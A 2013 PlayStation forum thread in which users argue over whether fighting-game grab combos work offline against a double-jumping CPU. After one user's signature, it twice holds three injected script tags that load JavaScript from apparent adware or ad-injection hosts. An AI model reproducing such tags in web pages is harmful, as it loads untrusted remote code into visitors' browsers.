I Only Post Everything
876 posts

Re: Guys... i broke jak... sorry...

[ Edited ]
Feb 24, 2013

Fromundaman wrote:
Poppa, just so you know Jak, and every other character in the cast, actually can combo into grabs on and offline. It's not new, but it does exist. Competitive players have been aware of this for some time. Dabuz even made a video about it.

Try it on a cpu set to double jump it wont work guaranteed. Or just tell me one of them and I will do it 100 times and I bet it only works vs a cpu not set to double jump. I used the same double jumping CPU to disprove every grab combo so far, especially the Kat grab after down square, these grab set ups only work online w/ lag. At say EVO (if psas were to ever make it) it will not work.

"ZA ZA ZA ZA ZING"
Mains: Jak, Isaac Subs: Spike, Drake, Evil Cole
6 Seasons with Black Belt! (should be 8)
Message 61 of 90 (90 Views)
0 Likes
Gaming Beast
2167 posts

Feb 24, 2013
You do realize they're 1 frame links right? If you smudge your timing even slightly it won't work.

We tested it with competitive players (In this case myself and Dabuz) who have considerably faster jump times than CPUs who don't jump right away. They are hard to land, but they are very much guaranteed if you have strict timing. Toro and Jak actually have some of the easier timings though. Especially Toro. Headbutt>grab is ridiculously easy to combo.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 62 of 90 (84 Views)
0 Likes
I Only Post Everything
876 posts

Feb 24, 2013

I just watched your video. That was clearly all recorded online since you cannot sign in two profiles to a single PS3. Try all your stuff against the CPU in practice mode on double jump. It will never work.

"ZA ZA ZA ZA ZING"
Message 63 of 90 (84 Views)
0 Likes
I Only Post Everything
876 posts

Feb 24, 2013

Fromundaman wrote:
You do realize they're 1 frame links right? If you smudge your timing even slightly it won't work.

We tested it with competitive players (In this case myself and Dabuz) who have considerably faster jump times than CPUs who don't jump right away. They are hard to land, but they are very much guaranteed if you have strict timing. Toro and Jak actually have some of the easier timings though. Especially Toro. Headbutt>grab is ridiculously easy to combo.

I never said I didn't know it worked, but unless you can show me this done offline to a double jumping practice dummy I will not believe it. I have tried 1000 times to do a grab combo in practice and it will not work on a double jumping cpu. Not once. There are extra frames online due to lag and the ps3's input lag it even has when offline. I have read all about the ps3 and lag / input lag online and how it effects SSF4 and UMVC3. The pros for those games play completely different online than offline due to the significant differences in frame data. I would love to see you do this offline you have a recording device please do it. I'm not trying to be malicious sorry if I am coming off that way but I just would bet money it is an online only combo and is impossible offline.

"ZA ZA ZA ZA ZING"
Message 64 of 90 (82 Views)
0 Likes
Gaming Beast
2167 posts

Feb 24, 2013
I don't have a recording device but not sure why I should need one since Dabuz recorded a video of it (Admittedly online), but it is used by competitive players on and offline. On top of this, unlike SSF4 and UMVC3, 90% of tournaments for this game do happen online due to a small scattered community.

That being said this isn't hard to test. Grab a friend, tell him to mash jump, and do this until you get the timing right. It works offline too. Pick Toro if you want to save time since his is the easiest to combo.

If you still don't want to believe me; meh. I'm just spreading information. If you don't want to hear it then that's your prerogative. I'll keep using it though and trying to get it patched out (At least for FP who can ToD with this tactic regardless of starting meter).

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 65 of 90 (79 Views)
0 Likes
Wastelander
792 posts

Feb 24, 2013
Guys let go
Message 66 of 90 (75 Views)
0 Likes
I Only Post Everything
876 posts

Feb 24, 2013

Fromundaman wrote:
I don't have a recording device but not sure why I should need one since Dabuz recorded a video of it (Admittedly online), but it is used by competitive players on and offline. On top of this, unlike SSF4 and UMVC3, 90% of tournaments for this game do happen online due to a small scattered community.

That being said this isn't hard to test. Grab a friend, tell him to mash jump, and do this until you get the timing right. It works offline too. Pick Toro if you want to save time since his is the easiest to combo.

If you still don't want to believe me; meh. I'm just spreading information. If you don't want to hear it then that's your prerogative. I'll keep using it though and trying to get it patched out (At least for FP who can ToD with this tactic regardless of starting meter).

I watched the video, I just have been told before that it is not possible offline, and from my own attempts in practice mode against a double jumping cpu I have yet to do it once. I know I'm not the best, but I know I am not just some other noob who cant do 1 frame combos. I am the only one who even brings up frame data when arguing with people on this forum. I get told how dumb frame data is, when in fact it is neccessary to master any fighting game.

But anyway I started a new thread to talk about this. go there and honestly if you can do it once to a cpu offline set to double jump let me know I will believe you since your also on pasta stadium forums (as am I) and are respected but just because this is the internet I am requesting honesty lol.

"ZA ZA ZA ZA ZING"
Message 67 of 90 (70 Views)
0 Likes
Sackboy
489 posts

Feb 24, 2013
Yeah there's nothing to achieve in keeping this thread alive.
Message 68 of 90 (69 Views)
0 Likes
Wastelander
792 posts

Feb 24, 2013
Y do t you two both be jak and see who is better that will settle the debate
Message 69 of 90 (63 Views)
0 Likes
Wastelander
827 posts

Feb 24, 2013

Levi_Skardsen wrote:

ToMuchMayo wrote:

Levi_Skardsen wrote:

ToMuchMayo wrote:

NewmansSalsa wrote:

so can we all come to the conclusion that OP is a little slow? and @ BigPoppa... alot of people dont understand frame data haha. they dont understand disadvantage, the words positive and negative. Because alot of these people dont actually play fighting games hardcore. I wish they had a website or something that showed the frame data for every character in this game.

Not being slow... if every character had one why no one use them? Probably because majority of people don't bother using other moves... i could careless about frame data. I want to know whether it works or not. 

caring.png

Do i care? If you are annoyed then i'll just keep using it to how i feel. If you continue to moan then you are just being trolled. win win for me.

Well obviously you do, since you said you could care less. Did the picture not help you at all?

Fail trolling here lol, keep trying dude. Again shows you have nothing to say. If you going to keep using that excuse why should i bother?

Message 70 of 90 (57 Views)
0 Likes